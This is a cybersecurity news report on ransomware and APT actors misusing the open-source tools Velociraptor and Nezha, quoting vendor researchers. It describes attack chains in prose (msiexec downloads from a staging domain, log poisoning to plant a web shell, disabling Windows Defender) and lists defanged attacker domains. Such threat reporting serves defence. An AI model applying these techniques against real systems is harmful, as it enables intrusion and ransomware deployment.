Threat actors are using an increasing variety of commercial and open-source products to carry out their attacks: according to researchers, Velociraptor and Nezha are the latest additions to their attack toolbox.
Velociraptor misuse
A suspected China-based ransomware threat actor has been spotted using Velociraptor, an open-source digital forensics and incident response tool, to maintain covert, persistent access on compromised systems while deploying Warlock, LockBit, and Babuk ransomware on VMware ESXi virtual machines and Windows servers.
“After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover,” Cisco Talos researchers found.
Judging by the matching indicators of compromise, Sophos incident responders have encountered the same attackers but prevented them from finishing the job (i.e., deploying the ransomware).
“The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool,” they shared.
“This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder.”
Nezha misuse
Nezha is an open-source server monitoring and task management tool that a suspected China-nexus APT group has been using to retrieve detailed information about compromised systems and control them.
Essentially, the group has been using it instead of other, more widely used remote monitoring and management tools.
“Beginning in August 2025, Huntress discovered an intrusion where a threat actor used a creative technique called log poisoning (also referred to as log injection) to plant a basic evaluation web shell (also commonly referred to as the China Chopper web shell) on a web server,” Huntress researchers noted.
“This allowed the threat actor to control the web server using AntSword [virtual terminal], before ultimately deploying Nezha, an operation and monitoring tool that allows commands to be run on a web server. Interestingly, this was subsequently used to deploy Ghost RAT on the system. To our knowledge, this is the first public reporting of Nezha being used to facilitate web compromises.”
Huntress researchers pinpointed the Nezha server instance used by the attackers, which showed an open Nezha interface.
“While the Nezha Monitoring server itself requires administrative credentials to retrieve detailed information about systems and control them via their installed Nezha Agent, it doesn’t require authentication to see system health information for systems it’s installed on,” they explained.
They took advantage of this to take a peek and saw that a Nezha client has been installed on more that 100 victim machines. (Also, that this threat actor was running their Nezha dashboard in Russian.)
The threat actor’s Nezha interface (Source: Huntress)
The attackers used the Nezha client (agent) to run an interactive PowerShell to kneecap Windows Defender and install a Ghost RAT variant.
“This activity highlights how attackers are increasingly abusing new and emerging publicly available tooling as it becomes available to achieve their goals,” the researchers added.
For threat actors, their appeal is clear: they are less likely to be detected by security products, and if detected, the provide plausible deniability compared to bespoke malware.
Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!
